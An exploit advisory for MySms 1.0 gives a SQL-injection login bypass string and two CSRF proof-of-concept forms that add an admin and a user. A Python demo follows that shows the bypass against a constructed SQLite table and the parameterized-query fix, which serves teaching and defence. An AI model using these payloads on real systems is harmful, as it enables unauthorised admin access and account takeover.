MySms 1.0 – Multiple Vulnerabilities

  • Author: AtT4CKxT3rR0r1ST
    Date: 2011-03-05
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/16279/
  • MySms v1.0 Multiple Vulnerabilities 
    ====================================================================
    
    ####################################################################
    .:. Author : AtT4CKxT3rR0r1ST[F.Hack@w.cn]
    
    ####################################################################
    
    ===[ Exploit ]===
    
    [1]Auth Bypass
    ===============
    
    www.site.com/MySms/admin/index.php
    
    Username: 'or'a'='a
    Password: 'or'a'='a
    
    [2]CSRF
    =======
    [Add Admin]
    ------------
    
    <html>
    <body>
    <form method="POST" name="form0" action="http://www.site/MySms/admin/adminadd.php">
    <input type="hidden" name="username" value="Webadmin"/>
    <input type="hidden" name="passwd" value="123456"/>
    </form>
    
    </body>
    </html>
    
    
    [Add User]
    -----------
    
    <html>
    <body>
    <form method="POST" name="form0" action="http://www.site/MySms/admin/usersadd.php">
    <input type="hidden" name="username" value="user"/>
    <input type="hidden" name="passwd" value="123456"/>
    <input type="hidden" name="active" value="y"/>
    <input type="hidden" name="email" value="Example@hotmail.com"/>
    <input type="hidden" name="sex" value="m"/>
    <input type="hidden" name="level" value="a"/>
    <input type="hidden" name="num_msg" value="100"/>
    </form>
    
    </body>
    </html>
    ####################################################################
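
The login input in [1] only has an effect when the admin login builds its SQL by string concatenation. The following is an added example, not code from MySms or from the advisory: the table, column names and query shape are assumptions, run against an in-memory SQLite database, and it shows the concatenated query next to the parameterized form that rejects the same input.

```python
import sqlite3

# Login input quoted from section [1] of the advisory.
ADVISORY_INPUT = "'or'a'='a"


def make_db():
    """Constructed stand-in for the admin table (schema is an assumption)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admin (username TEXT, passwd TEXT)")
    db.execute("INSERT INTO admin VALUES ('root', 'constructed-password')")
    return db


def login_concatenated(db, username, passwd):
    """Vulnerable pattern: request values become part of the SQL text."""
    sql = ("SELECT COUNT(*) FROM admin WHERE username='" + username +
           "' AND passwd='" + passwd + "'")
    # With the advisory input the WHERE clause ends in  OR 'a'='a'
    # which is true for every row, so the count is never zero.
    return db.execute(sql).fetchone()[0] > 0


def login_parameterized(db, username, passwd):
    """Hardened pattern: values are bound as data and never parsed as SQL."""
    sql = "SELECT COUNT(*) FROM admin WHERE username=? AND passwd=?"
    return db.execute(sql, (username, passwd)).fetchone()[0] > 0


def compare(username, passwd):
    """Return (concatenated_result, parameterized_result) for one attempt."""
    db = make_db()
    try:
        return (login_concatenated(db, username, passwd),
                login_parameterized(db, username, passwd))
    finally:
        db.close()


if __name__ == "__main__":
    attempts = [("root", "constructed-password"),
                ("root", "wrong"),
                (ADVISORY_INPUT, ADVISORY_INPUT)]
    for user, pw in attempts:
        print(repr(user), compare(user, pw))
```

Any attempt where the two results differ marks input that changed the query's structure; binding parameters removes that difference without filtering quotes.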